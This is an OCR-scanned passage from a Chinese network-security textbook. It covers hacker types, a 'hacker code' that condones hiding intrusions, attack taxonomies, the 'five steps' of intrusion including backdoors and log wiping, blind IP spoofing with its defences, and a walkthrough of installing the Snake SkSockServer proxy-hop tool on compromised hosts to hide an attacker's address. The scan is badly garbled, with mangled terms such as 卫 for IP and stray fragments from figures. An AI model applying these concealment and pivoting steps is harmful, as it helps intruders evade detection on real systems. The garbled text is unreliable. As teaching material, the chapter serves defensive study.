2010 年 1 月 12 日 上 午 7 点 钟 开 始 ， 全 球 最 大 中 文 搜索 引擎 “百度 ” 遭 到 黑客 攻击 ， 
长 时 间 无 法 正常 访问 。 主要 表现 为 跳 转 到 一 个 雅虎 出 错 页 面 、 出 现 伊朗 网 军 图 片 及 出 现 “ 天 
外 符号 ”等 ,范围 涉 及 四 川 、 和 福建、 江苏、 吉林、 浙江、 北京、 广东 等 国内 绝 大 部 分 省 市 。 
这 是 自 百 度 建立 以 来 ， 所 遭遇 的 持续 时 间 最 长 、 影 响 最 严重 的 黑客 攻击 。 
4.1.2 黑客 分 类 

第 一 种 分 类 是 将 黑客 分 为 破坏 者 、 红 客 和 间谍 ， 如 图 4-1 所 示 。 

(1) 破坏 者 :以 破坏 为 主 的 黑客 。 

(2) 红 客 : 红 客 一 词 比较 好 理解 点 ， 有 很 强 的 政治 性 ， 旨 在 抗击 外 来 网 络 入 侵 ， 维 护 


国内 网 络 安 全 ， 有 很 强 的 爱国 色彩 。 
(3) 间谍 : 属于 雇佣 兵 类 型 ， 专 门 为 了 利益 而 去 做 一 些 破坏 或 窃取 一 些 信息 。 


找 点 刺激 
搞 恶作剧 


国家 利益 
高 于 一 切 


谁 给 的 钱 
多 给 谁 干 


破坏 者 红 客 间谍 
图 4-1 黑客 分 类 
第 二 种 分 类 是 将 黑客 分 为 白 帽 子 、 黑 帽子 和 灰 帽 子 。 


(1) 白 帽 子 ， 是 创新 者 ， 研 究 漏洞 ， 发 明 追 求 最 先进 技术 并 让 大 家 共享 的 黑客 被 称 为 | 第 
“ 白 帽子 ”。 


地 上 
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(2) 黑 帽 子 ， 是 破坏 者 ， 以 破坏 入 侵 为 目的 的 黑客 ， 被 冠 以 “ 黑 帽 子 ” 
(3) 灰 帽 子 ， 是 破解 者 ， 介 于 以 上 二 者 之 间 的 ， 叫 做 “ 灰 帽 子 ”， 这 是 一 个 追求 网 上 

信息 公开 的 群体 ， 他 们 不 破坏 ， 但 要 进入 别人 的 网 站 去 拿 信息 。 

4.1.3 黑客 行为 发 展 趋势 


黑客 的 行为 有 7 个 方面 的 发 展 趋势 。 

(1) 手段 高 明 化 : 综合 各 种 流行 的 攻击 方法 ， 技 巧 性 更 强 ， 更 容易 得 手 。 例 如 ，guest 
显示 为 禁用 状态 ， 但 能 用 其 登录 而 且 拥 有 管理 员 权 限 ， 这 就 用 到 了 留 后 门 的 方法 ， 如 果 管 
理 员 不 知道 这 种 黑客 手段 ， 很 难 发 现 。 

(2) 活动 频繁 化 : 黑客 行为 将 越 来 越 频繁 ， 一 台 刚 刚 启动 的 服务 器 ， 在 几 分 钟 之 内 去 
查看 它 的 各 种 日 志 就 会 发 现 有 过 黑客 攻击 的 痕迹 。 

(3) 动机 复杂 化 : 黑客 行为 的 动机 也 更 加 复杂 ， 有 政治 目的 ,个 人 目的 ， 商 业 目 的 等 。 

(4) 黑客 年 轻 化 : 由 于 中 国 互联 网 的 普及 ， 形 成 全 球 一 体 化 ， 甚 至 连 很 多 偶 远 的 地 方 
也 可 以 从 网 络 上 接触 到 世界 各 地 形形色色 的 信息 资源 ， 所 以 越 来 越 多 对 这 方面 感 兴趣 的 中 
学 生 也 已 经 踏足 到 这 个 领域 。 

(5) 黑客 的 破坏 力 扩大 化 : 因 互联 网 的 普及 ， 电 子 商 务 也 在 蓬勃 发 展 ， 全 社会 对 互联 
网 的 依赖 性 日 益 增加 ， 黑 客 的 破坏 力也 日 益 扩 大 化 ， 仅 在 美国 ， 黑 客 每 年 造成 的 经 济 损失 
就 超过 100 亿美 元 ， 可 想 而 知 ， 对 于 网 络 安全 刚 起 步 的 中 国 ， 破 坏 的 影响 程度 有 多 大 了 。 

(6) 黑客 技术 的 迅速 普及 化 : 黑客 组 织 的 形成 和 黑客 傻瓜 式 工具 的 大 量 出 现 导 致 的 一 
个 直接 后 果 就 是 黑客 技术 的 普及 ， 在 Intemet 上 ， 黑 客 与 黑客 组 织 办 的 传授 黑客 技术 的 站 
点 比比 皆 是 ， 随 便 用 一 个 搜索 引擎 搜索 一 下 ， 就 能 找到 一 大 堆 。 这 些 黑 客站 点 提供 黑客 工 
具 ， 公 布 系统 漏洞 ， 公 开 传 授 黑 客 技术 ， 进 行 黑 客 教学 ， 甚 至 还 有 网 上 论坛 、 网 上 聊天 相 
互 交流 黑客 技术 经 验 ， 协 调 黑客 行动 。 黑 客 事件 的 剧 增 ， 黑 客 组 织 规模 的 扩大 ， 黑 客站 点 
的 大 量 涌现 ， 也 说 明了 黑客 技术 开始 普及 ， 甚 至 很 多 十 多 岁 的 年 轻 人 也 有 了 自己 的 黑客 站 
点 ， 从 很 多 BBS 上 也 可 以 看 到 学 习 探讨 黑客 技术 的 人 越 来 越 多 。 


(7) 黑客 组 织 化 ， 对 于 黑客 的 破坏 ， 人 们 的 网 

络 安全 意识 开始 增强 ， 计 算 机 产品 的 安全 性 被 放 在 黑客 精神 

很 重要 的 位 置 ， 漏 洞 和 缺陷 也 越 来 越 难 发 现 ， 而 且 

因为 利益 的 驱使 ， 黑 客 开始 由 原来 的 单 兵 作战 变 成 t 

有 组 织 的 黑客 群体 ， 在 黑客 组 织 内 部 ， 成 员 之 间 相 反 机 

互 交流 技术 经 验 , 共同 采取 黑客 行动 , 成 功率 增高 ，| 的 作 

影响 力也 更 大 。 精 新 的 
神 的 精 . 

4.1.4 黑客 精神 神 名 

要 成 为 一 名 真正 的 黑客 ， 需 要 具备 以 下 4 种 精 a 


神 ， 如 图 4-2 所 示 。 
1. Free 的 精神 
这 是 黑客 文化 的 精 茵 之 一 ，Free 是 黑客 最 应 该 具有 的 态度 。 在 互联 网 上 ， 黑 客 们 编写 


的 各 种 黑客 软件 都 是 完全 免费 共享 的 。 甚 至 连 源 代码 都 是 公开 的 ， 而 黑客 们 在 帮助 一 个 人 
之 后 ， 唯 一 的 要 求 只 是 他 在 成 长 起 来 后 同样 的 帮助 别人 。Free 的 精神 是 黑客 的 传统 精神 ， 
也 是 现代 黑客 们 所 尽力 保持 的 。 

2. 探索 与 创新 的 精神 

所 有 黑客 都 是 喜欢 探索 软件 程序 奥秘 的 人 ， 他 们 摸索 着 程序 与 系统 的 漏洞 ， 并 能 够 从 
中 学 到 很 多 的 知识 ， 在 发 现 问题 的 同时 ， 他 们 都 会 提出 解决 问题 的 新 方法 。 

3. 反 传 统 的 精神 

这 里 指 的 “ 反 传 统 ” 主 要 是 指 科 学 技术 上 的 反 传统 ， 并 不 包含 任何 贬义 。 黑 客 们 的 快 
乐 就 源 自 于 攻破 传统 的 东西 。 所 有 的 系统 在 没有 发 现 漏洞 之 前 ， 都 号 称 是 安全 的 。 找 出 系 
统 漏洞 ， 并 策划 相关 的 手段 利用 该 漏洞 进行 攻击 ， 这 是 黑客 永恒 的 工作 主题 。 

4. 合作 的 精神 

个 人 的 力量 是 有 限 的 ， 黑 客 们 很 明白 这 一 点 ， 因 此 才 有 了 那么 多 供 黑客 交流 的 论坛 。 


4.1.5 黑客 守则 


任何 职业 都 有 相关 的 职业 道德 ， 一 名 黑客 同样 有 职业 道德 ， 一 些 守则 是 必须 遵守 的 ， 
不 然 会 给 自己 招来 麻烦 ， 归 纳 起 来 就 是 “黑客 十 二 条 守则 ”。 

(1) 不 要 恶意 破坏 任何 系统 ， 这 样 做 只 会 给 自己 带 来 麻烦 。 

(2) 不 要 破坏 别人 的 软件 和 资料 。 

(3) 不 要 修改 任何 系统 文件 ， 如 果 是 因为 进入 系统 的 需要 而 修改 了 系统 文件 ， 请 在 目 
的 达到 后 将 它 改 回 原状 。 

(4) 不 要 轻易 将 要 黑 的 或 者 黑 过 的 站 点 告诉 不 信任 的 朋友 。 

(5) 在 发 表 黑 客 文章 时 不 要 用 真实 名 字 。 

(6) 正在 入 侵 时 ， 不 要 随意 离开 自己 的 计算 机 。 

(7) 不 要 入 侵 或 破坏 政府 机 关 的 主机 。 

(8) 将 笔记 放 在 安全 的 地 方 。 

(9) 已 侵入 的 计算 机 中 的 账号 不 得 清除 或 修改 。 

(10) 可 以 为 隐藏 自己 的 侵入 而 做 一 些 修改 ， 但 要 尽量 保持 原 系统 的 安全 性 ， 不 能 因 
为 得 到 系统 的 控制 权 而 将 门户 大 开 。 

(11) 不 要 做 一 些 无 聊 、 单 调 并 且 思 蠢 的 重复 性 工作 。 

(12) 做 真正 的 黑客 ， 读 遍 所 有 有 关系 统 安全 或 系统 漏洞 的 书 。 


4.1.6 ”安全 攻击 的 分 类 


X.800 和 RFC 2828 对 安全 攻击 进行 了 分 类 。 它们 把 攻击 分 为 两 类 : 被 动 攻击 和 主动 攻 
击 。 被 动 攻击 试图 获得 或 利用 系统 的 信息 ， 但 不 会 对 系统 的 资源 造成 破坏 。 而 主动 攻击 则 
不 同 ， 它 试图 破坏 系统 的 资源 ， 影 响 系统 的 正常 工作 。 

1. 被 动 攻击 

被 动 攻击 的 特性 是 对 所 传输 的 信息 进行 窃听 和 监测 。 攻 击 者 的 目标 是 获得 线路 上 所 传 
输 的 信息 。 信 息 泄漏 和 流量 分 析 就 是 两 种 被 动 攻 击 的 例子 。 

第 一 种 被 动 攻击 是 窃听 攻击 ， 如 图 4-3 所 示 。 电 子 邮 件 和 传输 的 文件 中 都 可 能 包含 敏 
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感 或 秘密 信息 ， 攻 击 者 通过 和 窃听， 可 以 截获 这 些 敏感 或 秘密 信息 ， 网 络 管理 人 员 要 做 的 工 
作 就 是 阻止 攻击 者 获得 这 些 信息 。 


阅读 从 用 户 A 到 用 户 B 的 消息 内 容 


用 户 C 
Intemet 或 其 他 通信 设施 对 


用 户 B 
图 4-3 ”窃听 攻击 


第 二 种 被 动 攻击 是 流量 分 析 ， 如 图 4-4 所 示 。 假 设 已 经 采取 了 某 种 措施 来 隐藏 消息 内 
容 或 其 他 信息 的 流量 ， 使 攻击 者 即使 捕获 了 消息 也 不 能 从 中 发 现 有 价值 的 信息 。 加 密 是 隐 
藏 消息 的 常用 方法 ， 即 使 对 信息 进行 了 合理 的 加 密 保护 ， 攻 击 者 仍然 可 以 通过 流量 分 析 获 
得 这 些 消息 的 模式 。 攻 击 者 可 以 确定 通过 主机 的 身份 及 其 所 处 的 位 置 ， 可 以 观察 传输 消息 
的 频率 和 长 度 ， 然 后 根据 所 获得 的 这 些 信息 推断 本 次 通信 的 性 质 。 


用 户 A 


观察 从 用 户 A 到 用 户 B 的 消息 模式 


发 


用 户 B 


用 户 C 


E 


Intemet 或 其 他 通信 设施 


用 户 A 
图 4-4 流量 分 析 


被 动 攻击 由 于 不 涉及 对 数据 的 更 改 ， 所 以 很 难 被 察觉 。 通 过 采用 加 密 措 施 ， 完 全 有 可 
能 阻止 这 种 攻击 。 因 此 ， 处 理 被 动 攻击 的 重点 是 预防 ， 而 不 是 检测 。 

2. 主动 攻击 

主动 攻击 是 指 恶 意 算 改 数据 流 或 伪造 数据 流 等 攻击 行为 ， 它 分 为 4 类。 

1) 伪装 攻击 

伪装 攻击 是 指 某 个 实体 假装 成 其 他 实体 ， 对 目标 发 起 攻击 ， 如 图 4-5 所 示 。 伪 装 攻击 
的 例子 有 : 攻击 者 捕获 认证 信息 ， 然 后 将 其 重 发 ， 这 样 攻击 者 就 有 可 能 获得 其 他 实体 所 拥 
有 的 访问 权限 。 


来 自用 户 C 的 消息 ,但 
看 上 去 好 像 来 自用 户 A 


图 4-5 伪装 攻击 


沁 


im 


) 重 放 攻 击 


重 放 攻 击 是 指 攻 击 者 为 了 达到 某 种 目的 ， 将 获得 的 信息 再 次 发 送 ， 以 在 非 授 权 的 情况 


下 进行 传输 ， 如 图 4-6 所 示 。 
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截获 从 用 户 A 到 用 户 B 的 
消息 ， 再 重 发 给 用 户 B 


用 户 A 


图 4-6 重 放 攻击 


) 消息 算 改 


消息 算 改 是 指 攻 击 者 对 所 获得 的 合法 消息 中 的 一 部 分 进行 修改 或 延迟 消息 的 传输 ， 以 
达到 其 非 授权 的 目的 ， 如 图 4-7 所 示 。 
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用 户 C 修 改 从 用 户 A 
、 到 用 户 B 的 消息 


一 


用 户 B 


Intemet 或 其 他 通信 设施 
用 户 A 


图 4-7 ”消息 算 改 


) 拒绝 服务 攻击 


拒绝 服务 攻击 则 是 指 阻止 或 禁止 人 们 正常 使 用 网 络 服务 或 管理 通信 设备 ， 如 图 4-8 所 
示 。 这 种 攻击 可 能 目标 非常 明确 。 


有 用户 C 破 坏 由 服务 器 
、 提供 的 服务 


bb 


用 户 A 


图 4-8 拒绝 服务 攻击 


E 动 攻击 与 被 动 攻 击 相反 ， 被 动 攻 击 虽然 难以 检测 ， 但 采取 某 些 安全 防护 措施 就 可 以 


有 效 阻止 ， 主 动 攻 击 虽 然 易于 检测 ， 但 却 难 以 阻止 。 所 以 对 付 主动 攻击 的 重点 应 当 放 在 如 


何 检测 并 发 现 它们 上 , 并 采取 相应 的 应 急 响 应 措施 , 并 使 系统 从 故障 状态 恢复 到 正常 运行 。 


黑人 银 与 厢 幅 IP 乱 厌 
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4.1.7 黑客 攻击 五 步 曲 


一 次 成 功 的 入 侵 攻 击 ， 可 以 归纳 成 基本 的 5 个 步骤 ， 也 是 人 们 和 常 说 的 “黑客 攻击 五 步 
， 如 图 4-9 所 示 ， 具 体 步骤 和 顺序 可 根据 攻击 时 实际 情况 随时 进行 调整 。 
1. 隐藏 IP 
入 侵 者 找到 远程 主机 /服务 器 的 系统 缺陷 后 ， 会 对 其 
进行 试探 性 的 入 侵 ， 此 时 ， 入 侵 者 将 要 面 对 的 可 能 是 缺乏 经 
验 的 个 人 计算 机 用 户 ， 也 可 能 是 藏 着 的 网 络 安全 专家 ， 也 许 
是 对 方 布下 的 一 个 网 络 陷阱 。 所 以 ， 对 于 有 经 验 的 入 侵 者 ， 
他 们 会 在 入 侵 时 步 步 小 心 , 使 用 各 种 方法 来 隐藏 自己 , 尽量 
不 去 直接 与 目标 接触 ， 以 免 直 接 暴露 给 远程 主机 /服务 器 。 

2. 信息 搜集 

俗称 踩点 , 就 是 通过 各 种 途径 对 所 要 攻击 的 目标 进行 多 
方面 的 了 解 。 图 4-9 黑客 攻击 五 步 曲 

3. 实施 入 侵 

得 到 管理 员 权 限 ， 连 接 到 远程 计算 机 ， 对 其 进行 控制 ， 达 到 自己 攻击 的 目的 。 

4. 保持 访问 

为 了 保持 长 期 对 胜利 果实 的 访问 权 ， 在 已 经 攻破 的 计算 机 上 种 植 一 些 供 自己 访问 的 
后 门 。 

5. 隐藏 踪迹 

一 次 成 功 的 入 侵 后 ， 一 般 在 对 方 的 计算 机 已 经 存储 了 相关 的 登录 日 志 ， 这 样 就 容易 被 
管理 员 发 现 。 在 入 侵 完毕 后 需要 清除 登录 日 志 及 其 他 相关 的 日 志 。 


4.2 隐藏 了 下 


三 


任何 攻击 者 都 不 希望 自己 的 攻击 行为 被 暴露 ， 所 以 在 实施 攻击 之 前 的 首要 任务 是 隐藏 


自己 的 下 地 址 。 
通常 有 两 种 方式 可 以 实现 隐藏 瑟 地 址 的 效果 。 
1. IP 欺骗 


所 谓 卫 欺骗 ， 就 是 伪造 某 台 主机 的 了 P 地 址 的 技术 ， 其 实质 就 是 让 一 台 机 器 来 扮演 另 
一 台 机 器 ， 以 达到 隐藏 自己 的 目的 。 

2. 网 络 代 理 跳板 

做 多 级 跳板 攻击 Sock 代理 ， 这 样 在 被 攻击 者 的 机 器 上 留 下 的 将 是 代理 跳板 主机 的 卫 
地 址 。 


4.2.1 JIP 坎 了 骗 


IP 欺骗 通常 要 用 编写 的 程序 实现 ，IP 欺骗 者 通过 使 用 RAW Socket 编程 ， 发 送 带 有 假 
冒 的 源 下 地 址 的 人 P 数据 包 ， 来 达到 自己 的 目的 。 另 外 ， 在 现在 的 网 上 ， 也 有 大 量 的 可 以 
发 送 伪造 的 了 P 地 址 的 工具 可 用 ， 使 用 它 可 以 任意 指定 源 瑟 地址 ， 以 免 留 下 自己 的 痕迹 。 
IP 是 网 络 层 的 一 个 面向 无 连接 的 协议 ，IP 数据 包 的 主要 内 容 由 源 他 地 址 ,目的 外 地 


址 和 所 传 数据 构成 ，IP 的 任务 就 是 根据 每 个 数据 报 文 的 目的 地 址 ， 路 由 完成 报 文 从 源 地 址 
到 目的 地 址 的 传送 。 至 于 报 文 在 传送 过 程 中 是 否 丢失 或 出 现 差错 ， 卫 不 会 考虑 ， 对 卫 来 
讲 ， 源 设备 与 目的 设备 没有 什么 关系 ， 它 们 是 相互 独立 的 。 耳 包 只 是 根据 数据 报 文 中 的 目 
的 地 址 发 送 ， 因 此 借助 高 层 协议 的 应 用 程序 来 伪造 IP 地 址 是 比较 容易 实现 的 。 

对 于 了 全 欺骗 的 状态 下 ， 三 次 握手 会 是 下 面 这 种 情况 。 

第 一 步 : 黑客 假冒 A 主机 IP 向 服务 方 B 主机 发 送 SYN， 告诉 B 主机 是 他 所 信任 的 A 
主机 想 发 起 一 次 TCP 连接 ， 序 列 号 为 数值 成 这 一 步 实现 比较 简单 ， 黑 客 将 IP 包 的 源 地 
址 伪造 A 主机 卫 地 址 即 可 。 

要 注意 的 是 , 在 攻击 的 整个 过 程 中 ,必须 使 A 主机 与 网 络 的 正常 连接 中 断 。 因 为 SYN 
请 求 中 卫 包 源 地 址 是 A 主机 的 ， 当 B 收 到 SYN 请 求 时 ， 将 根据 全 包 中 源 地 址 反馈 ACK 
SYN 给 A 主机 ， 但 事实 上 A 并 未 向 B 发 送 SYN 请 求 ， 所 以 A 收 到 后 会 认为 这 是 一 次 错 
误 的 连接 ， 从 而 向 B 回 送 RST， 中 断 连接 。 为 了 解决 这 个 问题 ， 在 整个 攻击 过 程 中 需要 设 
法 停止 A 主机 的 网 络 功 能 ， 使 之 拒绝 服务 即 可 。 

第 二 步 : 服务 方 B 产生 SYN ACK 响应 ， 并 向 请 求 方 A 主机 (注意 : 是 A, 不 是 黑客 ， 
因为 B 收 到 的 他 包 的 源 地 址 是 A) 发 送 ACK，ACK 的 值 为 了 1， 表 示 数 据 成 功 接 收 到 ， 
且 告 知 下 一 次 接收 到 字 节 的 SEQ 是 从 1， 同 时 ，B 向 请 求 方 A 发 送 自己 的 SEQ， 注 意 ， 
这 个 数值 对 黑客 是 不 可 见 的 。 

第 三 步 : 黑客 再 次 向 服务 方 发 送 ACK, 表示 接收 到 服务 方 的 回应 一 一 虽然 实际 上 他 并 
没有 收 到 服务 方 B 的 SYN ACK 响应 ， 这 次 它 的 SEQ 值 为 和 1， 同 时 它 必 须 猜 出 ACK 的 
值 ， 并 加 1 后 回馈 给 B 主机 。 

如 果 黑 客 能 成 功 的 猜 出 了 的 ACK 的 值 ， 那 么 TCP 的 三 次 握手 就 宣告 成 功 ，B 会 将 黑 
客 看 做 A 主机 。 黑 客 主机 这 种 连接 是 “盲人 ” 式 的 ， 黑客 永远 不 会 收 到 来 自 B 的 包 ， 因 为 
这 些 反 馈 包 都 被 路 由 到 A 主机 那里 了 。 

由 上 我 们 可 以 看 出 ，IP 欺骗 的 关键 在 于 猜 出 在 第 二 步 服 务 方 所 回应 的 SEQ 值 ， 有 了 
这 个 值 ，TCP 连接 方 可 成 功 的 建立 。 在 早期 ， 这 是 个 令 人 头疼 的 问题 ， 但 随 着 卫 欺骗 攻击 
手段 的 研究 日 益 深 入 ， 一 些 专用 的 算法 在 得 到 应 用 ， 并 产生 了 一 些 专用 的 C 程序 ， 如 
SEQ-scan 等 ， 当 黑客 使 用 这 些 C 程序 时 ， 一 切 问题 将 迎刃而解 。 


4.2.2 JP 欺骗 的 特征 


关于 卫 欺骗 技术 有 如 下 三 个 特征 。 

(1) 只 有 少数 平台 能 够 被 这 种 技术 攻击 ， 也 就 是 说 很 多 平台 都 不 具有 这 方面 的 缺陷 。 

(2) 这 种 技术 出 现 的 可 能 性 比较 小 ， 因 为 这 种 技术 不 好 理解 ， 也 不 好 操作 ， 只 有 一 些 
真正 的 网 络 高 手 才能 做 到 。 

(3) 很 容易 防备 这 种 攻击 方法 。 


4.2.3 IP 欺骗 的 防备 


1 防备 网 络 外 部 的 欺骗 

对 于 来 自 网 络 外 部 的 欺骗 来 说 ， 阻 止 这 种 攻击 的 方法 是 很 简单 的 ， 在 局 部 网 络 的 对 外 
路 由 器 上 加 一 个 限制 条 件 ， 只 要 在 路 由 器 内 部 设置 不 允许 声称 来 自 于 内 部 网 络 的 外 来 包 通 
过 就 行 了 。 尽 管 路 由 器 可 以 通过 分 析 测试 源 地 址 来 解决 卫 欺骗 中 的 一 般 问题 但是， 如 果 
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网 络 还 存在 外 部 的 可 信任 主机 ， 那 么 路 由 器 就 无 法 防止 别人 冒充 这 些 主机 而 进行 的 卫 欺骗 。 

2. 监视 网 络 

通过 对 信息 包 的 监控 来 检查 IP 欺骗 攻击 将 是 非常 有 效 的 方法 。 使 用 NETLOG 等 信息 
包 检 查 工具 对 信息 的 源 地 址 和 目的 地 址 进行 严 查 ， 如 果 发 现 了 信息 包 来 自 两 个 以 上 不 同 地 
址 ， 则 说 明 系 统 有 可 能 受到 了 IP 欺骗 ， 防 火 墙 外 面 正 有 黑客 试图 入 侵 系统 。 

另外 ， 应 该 注意 与 外 部 网 络 连接 的 路 由 器 ， 看 它 是 否 支 持 内 部 接口 。 如 果 路 由 器 有 支 
持 内 部 网 络 子 网 的 两 个 接口 ， 则 必须 警惕 ， 因 为 很 容易 受到 IP 欺骗 。 这 也 是 为 什么 说 将 
Web 服务 器 放 在 防火 墙 外 面 有 时 会 更 安全 的 原因 。 

3. 安装 过 滤 路 由 器 

检测 和 保护 站 点 免 受 瑟 欺骗 的 最 好 方法 就 是 安装 一 个 过 滤 路 由 器 , 来 限制 对 外 部 接口 
的 访问 ， 禁 止 带 有 内 部 网 络 资源 地 址 包 的 通过 。 当 然 也 应 禁止 (过 滤 ) 带 有 不 同 内 部 资源 
地 址 的 内 部 包 通 过 路 由 器 到 别 的 网 上 去 ， 这 就 防止 内 部 的 用 户 对 别 的 站 点 进行 PP 欺骗 。 
4.2.4 网 络 代理 跳板 


当 从 本 地 入 侵 其 他 主机 时 ， 自 己 的 瑟 会 暴露 给 对 方 ， 通 过 将 某 一 台 主机 设置 为 代理 ， 
通过 该 主机 再 入 侵 其 他 主机 , 就 会 留 下 代理 的 瑟 地 址 , 这 样 就 可 以 有 效 地 保护 自己 的 安全 。 
这 种 二 级 代理 的 基本 结构 如 图 4-10 所 示 。 


迷人 -二 


本 地 计算 机 代理 服务 器 1 代理 服务 器 2 被 入 侵 的 主机 
图 4-10 二 级 代理 的 基本 结构 


本 地 计算 机 通过 两 级 代理 入 侵 某 一 台 主 机 ， 这 样 被 入 侵 的 主机 上 ， 就 不 会 留 下 自己 的 
祝 息 。 可 以 选择 更 多 的 代理 级 别 ， 但 是 考虑 到 网 络 带宽 的 问题 ， 一 般 选 择 两 到 三 级 代理 比 
较 合适 。 可 以 选择 做 代理 的 主机 有 一 个 先决 条 件 ， 即 必须 先 安装 相关 的 代理 软件 ， 一 般 都 
是 将 已 经 入 侵 的 主机 作为 代理 服务 器 。 

4.2.5 网 络 代理 跳板 的 特点 


网 络 代理 跳板 的 特点 主要 有 以 下 几 个 方面 。 

(1) 从 本 地 机 器 连接 到 远程 机 器 ， 中 间 需 要 通过 安装 的 网 络 代 理 跳 板 ， 对 应 用 程序 而 
言 相 当 于 普通 的 Sock 代理 调用 。 

(2) 在 网 络 代理 跳板 之 间 传输 的 数据 已 经 被 动态 加 密 ， 加 密 种 子 每 次 不 同 。 

(3) 跳板 的 数目 由 1 一 255 不 限 ， 当 数目 为 0 时 相当 于 Sock 5 代理 服务 器 。 
4.2.6 网络 代 理 跳板 工具 的 使 用 


常用 的 网 络 代理 跳板 工具 很 多 ， 这 里 介绍 一 种 比较 常用 且 功能 比较 强大 的 代理 工 
其 一 一 Snake 代理 跳板 。 


Snake 代理 跳板 支持 TCP/UDP 代理 ， 支 持 多 个 (最 多 达到 255) 跳板 。 程 序 文件 为 
SkSockServerexe， 代 理 方 式 为 Socks， 并 自动 默认 端口 1813 监听 。 

使 用 Snake 代理 跳板 需要 首先 在 每 一 级 跳板 主机 上 安装 Snake 代理 服务 器 。 程 序 文 件 
是 SkSockServerexe， 将 该 文件 拷贝 到 目标 主机 上 。 一 般 首先 将 本 地 计算 机 设置 为 一 级 代 
理 ， 将 文件 拷贝 到 C 盘 根 目 录 下 ， 然 后 代理 服务 安装 到 主机 上 。 安 装 并 运行 sksockserver 
的 命令 如 下 : 

C:\>sksockserver -install (安装 服务 ) 

C:\> net start skserver (启动 服务 ) 


安装 时 这 两 个 步骤 是 必需 的 ， 如 图 4-11 所 示 。 


[CAWINNT\SYstem32Ncmd.eXE 


C:\>sksockserver -install 
Snake SockProxy Service installed. 


C:\>net start skseruer 


C:\> 


图 4-11 安装 跳板 服务 器 


安装 并 启动 代理 服务 后 , 使 用 netstat-an 命令 查看 1813 端口 是 否 开放 , 如 图 4-12 所 示 。 
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图 4-12 查看 开放 的 1813 端口 


服务 器 端 设置 完毕 后 , 在 本 地 主机 上 使 用 本 地 代理 配置 工具 SkServerGULexe, 该 配置 
工具 的 主 界面 如 图 4-13 所 示 。 
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snake 的 代理 跳板 GUI 版 (Base On SkSockServyer ¥1.06 Build0023) -lo| xl 
命令 C 配置 E 帮助 H 
雁 过 :” 卫生 在 英 口 :1913 


Epa 


图 4-13 ”代理 级 别 配置 工具 
选择 主 菜单 “配置 ”下 的 菜单 项 “经 过 的 SkServer”， 在 出 现 的 对 话 框 中 设置 代理 的 顺 
序 ， 第 一 级 代理 是 192.168.8.112 (真实 机 IP)， 端 口 是 1813 端口 ， 注 意 将 复 选 框 “ 人 允许 ” 


选中 (代表 启用 )， 如 图 4-14 所 示 。 

接 下 来 设置 可 以 访问 该 代理 的 客户 端 ， 选 择 主 菜单 “配置 ”下 的 菜单 项 “客户 端 ”， 
这 里 只 允许 本 地 访问 该 代理 服务 ， 所 以 将 瑟 地 址 设置 为 127.0.0.1 (本 机 的 回环 地 址 )， 子 
网 掩 码 设置 为 “25S5.255.255.255”， 并 将 复 选 框 “ 人 允许 ”选中 ， 如 图 4-15 所 示 。 


EEEEE 到 
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255. 255. 255. 255 


至 站 
hz7.0.0.1 |255. 255. 255. 255 “JY 下 允许 ? 
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图 4-14 设置 经 过 的 代理 服务 器 图 4-15 设置 可 以 访问 代理 的 客户 端 


这 样 ， 一 个 一 级 代理 设置 完毕 ， 选 择 菜单 栏 “ 命 令 ” 下 的 菜单 项 “开始 ”， 启 动 该 代 
理 跳板 。 

下 面 需 要 安装 代理 的 客户 端 程序 ， 该 程序 包含 两 个 程序 文件 ， 一 个 是 安装 程序 ， 另 一 
个 是 汉化 补丁 ， 注 意 : 如 果 不 安装 补丁 程序 将 不 能 使 用 该 客户 端 程序 ， 如 图 4-16 所 示 。 

首先 安装 sc32r230.exe， 再 安装 补丁 程序 HBC-SC3223-Ronnierexe， 然 后 执行 该 程序 ， 


首先 出 现 设 置 窗口 ， 如 图 4-17 所 示 。 


留 总 


sc32r230.e HBC-SC32 


Xe 23-Ronnie 
rexe 
图 4-16 安装 程序 和 汉化 补丁 图 4-17 设置 Socks 代理 


设置 Socks 代理 服务 器 为 本 地 IP 地 址 127.0.0.1， 端 口 设置 为 跳板 的 监听 端口 1913， 
选择 Socks 版 本 5 作为 代理 。 设 置 完毕 后 ， 单 击 “ 确 定 ” 主 界面 如 图 4-18 所 示 。 


SocksCap 控制 台 


图 4-18 代理 客户 端的 主 界面 
添加 需要 代理 的 应 用 程序 ， 单 击 工具 栏 图 标 “ 新 建 ”， 例 如 现在 添加 正 〈Intermet 
Explore)， 设 置 方式 如 图 4-19 所 示 。 
新 建 应 用 程序 标识 项 


:AProgran Files\Internet Exp 


图 4-19 设置 需要 代理 的 应 用 程序 


二 下 只 
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同 经 颁 会 及 大 理 雁 与 笑 嘴 


设置 完毕 后 ， 焉 的 图 标 就 在 列表 中 了 ， 选 中 正 图 标 ， 然 后 单 击 工具 栏 图 标 “ 运 行 ”， 
如 图 4-20 所 示 。 


SocksCap 控制 台 -lo|xl 
文件 (E) 查看 (四 ”帮助 (H) 


| 
新 建 | 删除 | 修改 加 
Ba 


运行 Sock 代理 任务 


图 4-20 运行 程序 


在 正 的 连接 过 程 中 ,查看 代理 跳板 的 对 话 框 ,可 以 看 到 连接 的 信息 。 注 意 ; 这 些 信 息 
在 一 次 连接 会 话 完毕 后 会 自动 消失 。 


思考 与 练习 


1. 简 述 黑客 的 分 类 ， 以 及 黑客 需要 具备 哪些 精神 。 
2. 黑客 攻击 的 步 又， 每 个 步骤 的 目的 是 什么 ? 

3 简 述 黑客 攻击 的 类 型 。 

4. 简 述 网 络 代理 跳板 的 功能 。 


第 5 章 网 络 扫描 与 网 络 监 


本 章 学 习 目 标 : 

。 了 解 信息 搜集 的 种 类 ; 

。 掌握 网 络 安全 扫描 的 步骤 ; 
。 掌握 操作 系统 探测 技术 原理 ; 
。 掌握 监听 原理 ; 

。 了 解 各 种 监听 工具 使 用 方法 。 


5.1 信息 搜集 


S.1.1 信息 搜集 概述 


古语 云 : 知己 知 彼 ， 百 战 不 殉 。 如 图 5-1 所 示 ， 入 侵 者 在 入 侵 之 前 都 会 想方设法 搜集 
尽 可 能 多 的 信息 ， 获 得 的 信息 越 多 ， 发 现 的 缺陷 也 就 越 多 ， 入 侵 攻 击 的 成 功率 也 就 越 高 。 
其 实 ， 作 为 一 个 入 侵 者 ， 会 花费 大 量 的 时 间 在 进行 信息 搜集 、 筛 选 、 分 析 、 再 搜集 、 再 得 
选 、 再 分 析 这 样 最 重要 也 是 最 枯燥 的 工作 ， 所 以 ， 花 费 在 信息 搜集 上 的 时 间 往 往 是 整个 攻 
击 过 程 中 最 多 的 。 入 侵 者 的 哲学 是 :“ 没 有 无 用 信息 ”。 


成 功率 越 高 


